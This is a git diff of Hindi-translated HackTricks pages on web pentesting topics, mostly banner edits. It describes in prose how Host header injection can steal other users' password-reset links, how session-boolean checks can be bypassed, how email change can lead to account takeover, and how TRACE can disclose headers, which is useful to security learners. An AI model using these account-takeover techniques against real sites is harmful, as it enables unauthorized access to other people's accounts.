-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
+{% endhint %}
-# मूल Payloads
+# मूल पेलोड
-* **सरल सूची:** बस एक सूची जिसमें प्रत्येक पंक्ति में एक प्रविष्टि होती है
-* **रनटाइम फ़ाइल:** एक सूची जो रनटाइम में पढ़ी जाती है (मेमोरी में लोड नहीं होती)। बड़ी सूचियों का समर्थन करने के लिए।
-* **केस मॉडिफिकेशन:** स्ट्रिंग्स की एक सूची में कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचले केस में, ऊपरी केस में, प्रॉपर नाम - पहला अक्षर बड़ा और बाकी निचले केस में-, प्रॉपर नाम -पहला अक्षर बड़ा और बाकी वैसे ही रहते हैं-।
-* **संख्याएँ:** X से Y तक Z कदम या यादृच्छिक रूप से संख्याएँ उत्पन्न करें।
-* **ब्रूट फोर्सर:** अक्षर सेट, न्यूनतम और अधिकतम लंबाई।
+* **सरल सूची:** हर पंक्ति में एक प्रविष्टि वाली सूची
+* **रनटाइम फ़ाइल:** रनटाइम में पढ़ी गई सूची (मेमोरी में लोड नहीं की गई)। बड़ी सूचियों का समर्थन करने के लिए।
+* **केस संशोधन:** स्ट्रिंग की सूची पर कुछ परिवर्तन लागू करें (कोई परिवर्तन नहीं, निचे, ऊपर, उचित नाम - पहले कैपिटलाइज़्ड और बाकी को निचे करना-, उचित नाम - पहले कैपिटलाइज़्ड और बाकी वैसा ही रहना-।
+* **नंबर्स:** X से Y तक नंबर उत्पन्न करें Z कदम या यादृच्छिक रूप से।
+* **ब्रूट फोर्सर:** वर्ण सेट, न्यूनतम और अधिकतम लंबाई।
-[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : DNS अनुरोधों के माध्यम से कमांड्स को निष्पादित करने और आउटपुट प्राप्त करने के लिए Payload।
+[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : कमांड निष्पादित करने और आउटपुट को burpcollab के DNS अनुरोधों के माध्यम से पकड़ने के लिए पेलोड।
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
-
-
-
-
-AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ!
-
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
-
-
diff --git a/todo/emails-vulns.md b/todo/emails-vulns.md
index 8f7cd8824..a364204fe 100644
--- a/todo/emails-vulns.md
+++ b/todo/emails-vulns.md
@@ -1,29 +1,35 @@
-# ईमेल सुरक्षा की कमियाँ
+# ईमेल सुरक्षा कमियाँ
+
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥
+HackTricks का समर्थन करें
-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
-* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
+* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %}
##
-##
+##
+
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-☁️ हैकट्रिक्स क्लाउड ☁️ -🐦 ट्विटर 🐦 - 🎙️ ट्विच 🎙️ - 🎥 यूट्यूब 🎥
+HackTricks का समर्थन करें
-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की उपलब्धता** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें।**
-* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) देखें!
+* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
+{% endhint %}
diff --git a/todo/interesting-http.md b/todo/interesting-http.md
index 055fae8bf..db9d9653c 100644
--- a/todo/interesting-http.md
+++ b/todo/interesting-http.md
@@ -1,29 +1,30 @@
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
+{% endhint %}
-# Referrer headers और policy
+# रेफरर हेडर्स और नीति
-Referrer वह header है जिसका उपयोग ब्राउज़र यह इंगित करने के लिए करते हैं कि पिछला पृष्ठ कौन सा था।
+रेफरर वह हेडर है जिसका उपयोग ब्राउज़र द्वारा किया जाता है ताकि पता चले कि पिछले दौरे का कौन सा पृष्ठ देखा गया था।
-## संवेदनशील जानकारी का लीक होना
+## संवेदनशील जानकारी लीक हो गई
-यदि किसी वेब पेज के अंदर किसी बिंदु पर कोई संवेदनशील जानकारी GET request पैरामीटर्स पर स्थित होती है, और यदि पेज में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उपयोगकर्ता को उस URL पर जाने के लिए मना सकता है (सामाजिक इंजीनियरिंग) जो हमलावर द्वारा नियंत्रित होता है। तो वह नवीनतम GET request के अंदर संवेदनशील जानकारी को बाहर निकालने में सक्षम हो सकता है।
+यदि किसी वेब पृष्ठ के अंदर किसी GET अनुरोध पैरामीटर पर कोई संवेदनशील जानकारी होती है, यदि पृष्ठ में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उसे एक URL पर जाने के लिए मजबूर करता है/सुझाव देता है (सोशल इंजीनियरिंग), तो वह हमलावर संवेदनशील जानकारी को नवीनतम GET अनुरोध के अंदर निकाल सकता है।
-## निवारण
+## संशोधन
-आप ब्राउज़र को एक **Referrer-policy** का पालन करने के लिए बना सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशन्स को भेजे जाने से **रोक** सकता है:
+आप ब्राउज़र को एक **रेफरर-नीति** का पालन करने के लिए कर सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशनों को भेजने से **बचा** सकता है:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
@@ -34,28 +35,28 @@ Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
-## प्रतिरोध-निवारण
+## काउंटर-मिटिगेशन
-आप इस नियम को एक HTML मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को HTML इंजेक्शन का शोषण करने की आवश्यकता है):
+आप इस नियम को एचटीएमएल मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को एचटीएमएल इंजेक्शन का शोषण करना होगा):
```markup
```
## रक्षा
-URL में GET पैरामीटर्स या पथों के अंदर कभी भी संवेदनशील डेटा न रखें।
+कभी भी URL में GET पैरामीटर या पथ में कोई भी संवेदनशील डेटा न डालें।
+{% hint style="success" %}
+AWS हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
- AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %}
diff --git a/todo/other-web-tricks.md b/todo/other-web-tricks.md
index 13459455d..332e40ac4 100644
--- a/todo/other-web-tricks.md
+++ b/todo/other-web-tricks.md
@@ -1,34 +1,63 @@
# अन्य वेब ट्रिक्स
+{% hint style="success" %}
+**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
+HackTricks का समर्थन करें
-* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
-* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
-* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने ट्रिक्स साझा करें**.
+* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %}
-### होस्ट हैडर
+### होस्ट हेडर
-कई बार बैक-एंड **होस्ट हैडर** पर भरोसा करता है कि कुछ कार्रवाई करें। उदाहरण के लिए, यह इसका मूल्य उपयोग करके **पासवर्ड रीसेट भेजने के लिए डोमेन** के रूप में इस्तेमाल कर सकता है। तो जब आपको अपना पासवर्ड रीसेट करने के लिए एक लिंक वाला ईमेल मिलता है, तो उपयोग किया जा रहा डोमेन वही होता है जिसे आपने होस्ट हैडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं के पासवर्ड रीसेट को अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुराने के लिए अपने नियंत्रण में एक डोमेन पर बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
+कई बार बैक-एंड **होस्ट हेडर** पर भरोसा करता है **कुछ क्रियाएँ करने के लिए**। उदाहरण के लिए, यह अपने मान्यता को **पासवर्ड रीसेट भेजने के लिए उसका मान्यता उपयोग कर सकता है**। तो जब आप एक ईमेल प्राप्त करते हैं जिसमें अपना पासवर्ड रीसेट करने का लिंक होता है, तो उस डोमेन का उपयोग किया जा रहा है वह डोमेन है जिसे आपने होस्ट हेडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं का पासवर्ड रीसेट करने का अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुरा सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %}
-ध्यान दें कि यह संभव है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने की प्रतीक्षा नहीं करनी पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण / बॉट इसे विश्लेषण करने के लिए क्लिक करेंगे**।
+ध्यान दें कि यह संभावित है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने का इंतजार नहीं करना पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण/बॉट इसे विश्लेषित करने के लिए क्लिक करेंगे**।
{% endhint %}
### सत्र बूलियन
-कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं, तो बैक-एंड **आपके सत्र में सुरक्षा गुणधर्म के लिए "True" के साथ एक बूलियन जोड़ देगा**। फिर, एक अलग एंडपॉइंट जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
-हालांकि, यदि आप **जांच पास करते हैं** और आपके सत्र को सुरक्षा गुणधर्म में "True" मान दिया जाता है, तो आप उन संसाधनों का प्रयास कर सकते हैं जो **उसी गुणधर्म पर निर्भर करते हैं** लेकिन आपको **पहुँचने की अनुमति नहीं होनी चाहिए**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
+कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं तो बैक-एंड **केवल एक बूलियन को "सच" के मान सुरक्षा विशेषता में आपके सत्र में जोड़ देगा**। फिर, एक विभिन्न अंतबार्ता जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
+हालांकि, यदि आप **जांच पास** करते हैं और आपके सत्र को सुरक्षा विशेषता में "सच" मान्यता दी जाती है, तो आप कोशिश कर सकते हैं **अन्य संसाधनों तक पहुंचने** की जो **उसी विशेषता पर निर्भर** करते हैं लेकिन आपको **पहुंचने की अनुमति नहीं** है। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### पंजीकरण कार्यक्षमता
-एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने का प्रयास करें। समानार्थक वर्णों (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने का प्रयास करें।
+कोशिश करें कि एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करें। इसके अलावा समानार्थक वर्ण भी उपयोग करने की कोशिश करें (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड)।
-### ईमेल का तबादला
+### ईमेल का अधिकार
-एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टिकरण ईमेल पहले पंजीकृत ईमेल पर भेज
+एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टि ईमेल पहले पंजीकृत ईमेल पर भेजा जाता है, तो आप किसी भी ईमेल को अधिकार में ले सकते हैं। या यदि आप पहले वाले को दूसरे ईमेल की पुष्टि करने की अनुमति दे सकते हैं, तो आप किसी भी खाता को अधिकार में ले सकते हैं।
+
+### कंपनियों के आटलासियन का आंतरिक सर्विसडेस्क तक पहुंचें
+
+{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
+
+### TRACE विधि
+
+डेवलपर्स कई बार उत्पादन वातावरण में विभिन्न डीबगिंग विकल्पों को अक्षम करना भूल जाते हैं। उदाहरण के लिए, HTTP `TRACE` विधि निदानात्मक उद्देश्यों के लिए डिज़ाइन की गई है। यदि सक्षम है, तो वेब सर्वर उन अनुरोधों का प्रतिसाद देगा जो `TRACE` विधि का उपयोग करते हैं और प्रतिसाद में उस अनुरोध को गुणाकार में वापस भेजेगा जो प्राप्त किया गया था। यह व्यवहार अक्सर अहानिक होता है, लेकिन कभी-कभी सूचना खुलासा करता है, जैसे कि आंतरिक प्रमाणीकरण हेडरों का नाम जो अनुरोधों में प्रतिस्थापित किया जा सकता है द्वारा प्रतिस्थापित किया जा सकता है।![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
+
+![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
+
+
+{% hint style="success" %}
+**AWS हैकिंग सीखें और प्रैक्टिस करें:**[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks का समर्थन करें
+
+* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+
+
+{% endhint %}
diff --git a/todo/pentesting-dns.md b/todo/pentesting-dns.md
index 4f2500d66..bf1342d7e 100644
--- a/todo/pentesting-dns.md
+++ b/todo/pentesting-dns.md
@@ -1,36 +1,21 @@
+{% hint style="success" %}
+सीखें और प्रैक्टिस करें AWS हैकिंग:[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+सीखें और प्रैक्टिस करें GCP हैकिंग: [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
+हैकट्रिक्स का समर्थन करें
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
+* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
+* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
+* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
+{% endhint %}
-**DNS पर हमलों के बारे में और अध्ययन करें**
+**DNS पर हमलों के बारे में अधिक अनुसंधान करें**
**DNSSEC और DNSSEC3**
**IPv6 में DNS**
-
-
-
-
-
-AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
-
-HackTricks का समर्थन करने के अन्य तरीके:
-
-* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
-* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
-* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
-
-
diff --git a/todo/post-exploitation.md b/todo/post-exploitation.md
index 1ed0d1b4c..d36d57760 100644
